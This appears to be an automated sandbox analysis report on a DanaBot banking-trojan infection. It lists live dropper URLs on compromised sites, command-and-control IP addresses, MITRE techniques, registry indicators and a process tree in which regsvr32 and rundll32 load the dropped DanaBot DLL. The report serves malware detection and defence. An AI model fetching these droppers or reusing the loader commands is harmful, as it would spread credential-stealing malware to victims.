danabot | hxxp://adwaredownload

Analysis

max time kernel
177s
max time network
177s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
04-08-2024 16:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://adwaredownload

Score

10^/10

danabot banker botnet discovery trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://blockchainjoblist.com/wp-admin/014080/

exe.dropper

https://womenempowermentpakistan.com/wp-admin/paba5q52/

exe.dropper

https://atnimanvilla.com/wp-content/073735/

exe.dropper

https://yeuquynhnhai.com/upload/41830/

exe.dropper

https://deepikarai.com/js/4bzs6/

Extracted

Family

danabot

51.178.195.151

51.222.39.81

149.255.35.125

38.68.50.179

51.77.7.204

rsa_pubkey.plain

Signatures

Danabot
Danabot is a modular banking Trojan that has been linked with other malware.
trojan banker danabot

Danabot x86 payload 1 IoCs

Detection of Danabot x86 payload, mapped in memory during the execution of its loader.

botnet

resource	yara_rule
behavioral1/files/0x0009000000023530-1429.dat	family_danabot

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2468	1632	powershell.exe	133

Blocklisted process makes network request 5 IoCs

flow	pid	Process
128	2468	powershell.exe
130	2468	powershell.exe
133	2468	powershell.exe
136	2468	powershell.exe
142	5616	rundll32.exe

Downloads MZ/PE file

Executes dropped EXE 1 IoCs

pid	Process
5416	DanaBot.exe

Loads dropped DLL 2 IoCs

pid	Process
5524	regsvr32.exe
5616	rundll32.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
118	raw.githubusercontent.com
119	raw.githubusercontent.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Program crash 1 IoCs

pid	pid_target	Process	procid_target
5600	5416	WerFault.exe	142

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DanaBot.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1302416131-1437503476-2806442725-1000\{D36EDBB2-04FF-4F14-812E-8F98CA5626C5}	msedge.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 151358.crdownload:SmartScreen	msedge.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
1716	WINWORD.EXE
1716	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 17 IoCs

pid	Process
2200	msedge.exe
2200	msedge.exe
2012	msedge.exe
2012	msedge.exe
1928	msedge.exe
1928	msedge.exe
4304	msedge.exe
4304	msedge.exe
4464	msedge.exe
4464	msedge.exe
4464	msedge.exe
4464	msedge.exe
2468	powershell.exe
2468	powershell.exe
2468	powershell.exe
1976	msedge.exe
1976	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 20 IoCs

pid	Process
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2468	powershell.exe

Suspicious use of FindShellTrayWindow 58 IoCs

pid	Process
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
1716	WINWORD.EXE
1716	WINWORD.EXE
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe

Suspicious use of SetWindowsHookEx 17 IoCs

pid	Process
1716	WINWORD.EXE
1716	WINWORD.EXE
1716	WINWORD.EXE
1716	WINWORD.EXE
1716	WINWORD.EXE
1716	WINWORD.EXE
1716	WINWORD.EXE
1716	WINWORD.EXE
1716	WINWORD.EXE
1716	WINWORD.EXE
1716	WINWORD.EXE
1716	WINWORD.EXE
1716	WINWORD.EXE
1716	WINWORD.EXE
1716	WINWORD.EXE
1716	WINWORD.EXE
1716	WINWORD.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2012 wrote to memory of 4924	2012	msedge.exe	84
PID 2012 wrote to memory of 4924	2012	msedge.exe	84
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2836	2012	msedge.exe	85
PID 2012 wrote to memory of 2200	2012	msedge.exe	86
PID 2012 wrote to memory of 2200	2012	msedge.exe	86
PID 2012 wrote to memory of 4564	2012	msedge.exe	87
PID 2012 wrote to memory of 4564	2012	msedge.exe	87
PID 2012 wrote to memory of 4564	2012	msedge.exe	87
PID 2012 wrote to memory of 4564	2012	msedge.exe	87
PID 2012 wrote to memory of 4564	2012	msedge.exe	87
PID 2012 wrote to memory of 4564	2012	msedge.exe	87
PID 2012 wrote to memory of 4564	2012	msedge.exe	87
PID 2012 wrote to memory of 4564	2012	msedge.exe	87
PID 2012 wrote to memory of 4564	2012	msedge.exe	87
PID 2012 wrote to memory of 4564	2012	msedge.exe	87
PID 2012 wrote to memory of 4564	2012	msedge.exe	87
PID 2012 wrote to memory of 4564	2012	msedge.exe	87
PID 2012 wrote to memory of 4564	2012	msedge.exe	87
PID 2012 wrote to memory of 4564	2012	msedge.exe	87
PID 2012 wrote to memory of 4564	2012	msedge.exe	87
PID 2012 wrote to memory of 4564	2012	msedge.exe	87
PID 2012 wrote to memory of 4564	2012	msedge.exe	87
PID 2012 wrote to memory of 4564	2012	msedge.exe	87
PID 2012 wrote to memory of 4564	2012	msedge.exe	87
PID 2012 wrote to memory of 4564	2012	msedge.exe	87

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://adwaredownload
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2012
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa23ce46f8,0x7ffa23ce4708,0x7ffa23ce4718
  2⤵
  PID:4924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1824,12190186680196869760,6276055307869383433,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1952 /prefetch:2
  2⤵
  PID:2836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1824,12190186680196869760,6276055307869383433,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2512 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2200
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1824,12190186680196869760,6276055307869383433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2856 /prefetch:8
  2⤵
  PID:4564
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,12190186680196869760,6276055307869383433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1
  2⤵
  PID:512
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,12190186680196869760,6276055307869383433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
  2⤵
  PID:4480
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,12190186680196869760,6276055307869383433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4208 /prefetch:1
  2⤵
  PID:4996
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,12190186680196869760,6276055307869383433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4768 /prefetch:1
  2⤵
  PID:1992
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1824,12190186680196869760,6276055307869383433,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:8
  2⤵
  PID:3400
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1824,12190186680196869760,6276055307869383433,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:8
  2⤵
  PID:3680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,12190186680196869760,6276055307869383433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3672 /prefetch:1
  2⤵
  PID:4404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,12190186680196869760,6276055307869383433,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1
  2⤵
  PID:4504
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,12190186680196869760,6276055307869383433,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3736 /prefetch:1
  2⤵
  PID:1308
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,12190186680196869760,6276055307869383433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3516 /prefetch:1
  2⤵
  PID:3840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,12190186680196869760,6276055307869383433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5012 /prefetch:1
  2⤵
  PID:3772
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1824,12190186680196869760,6276055307869383433,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3788 /prefetch:8
  2⤵
  PID:5032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1824,12190186680196869760,6276055307869383433,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5080 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:1928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,12190186680196869760,6276055307869383433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:1
  2⤵
  PID:4272
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,12190186680196869760,6276055307869383433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5676 /prefetch:1
  2⤵
  PID:4008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,12190186680196869760,6276055307869383433,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:1
  2⤵
  PID:2516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,12190186680196869760,6276055307869383433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3508 /prefetch:1
  2⤵
  PID:1292
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,12190186680196869760,6276055307869383433,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4008 /prefetch:1
  2⤵
  PID:4700
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,12190186680196869760,6276055307869383433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2256 /prefetch:1
  2⤵
  PID:2644
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,12190186680196869760,6276055307869383433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1728 /prefetch:1
  2⤵
  PID:4532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,12190186680196869760,6276055307869383433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:1
  2⤵
  PID:4400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,12190186680196869760,6276055307869383433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3624 /prefetch:1
  2⤵
  PID:1808
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1824,12190186680196869760,6276055307869383433,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6420 /prefetch:8
  2⤵
  PID:3688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,12190186680196869760,6276055307869383433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6384 /prefetch:1
  2⤵
  PID:2628
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1824,12190186680196869760,6276055307869383433,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6596 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4304
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1824,12190186680196869760,6276055307869383433,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2648 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,12190186680196869760,6276055307869383433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1
  2⤵
  PID:6120
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1824,12190186680196869760,6276055307869383433,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6188 /prefetch:8
  2⤵
  PID:5236
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1824,12190186680196869760,6276055307869383433,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6980 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1976
- C:\Users\Admin\Downloads\DanaBot.exe
  "C:\Users\Admin\Downloads\DanaBot.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5416
- - C:\Windows\SysWOW64\regsvr32.exe
    C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\DOWNLO~1\DanaBot.dll f1 C:\Users\Admin\DOWNLO~1\DanaBot.exe@5416
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:5524
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\DOWNLO~1\DanaBot.dll,f0
      4⤵
      Blocklisted process makes network request
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:5616
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5416 -s 460
    3⤵
    - Program crash
    PID:5600

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2688

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2848

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2172

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Temp1_Emotet.zip\[email protected]" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1716
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:264

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
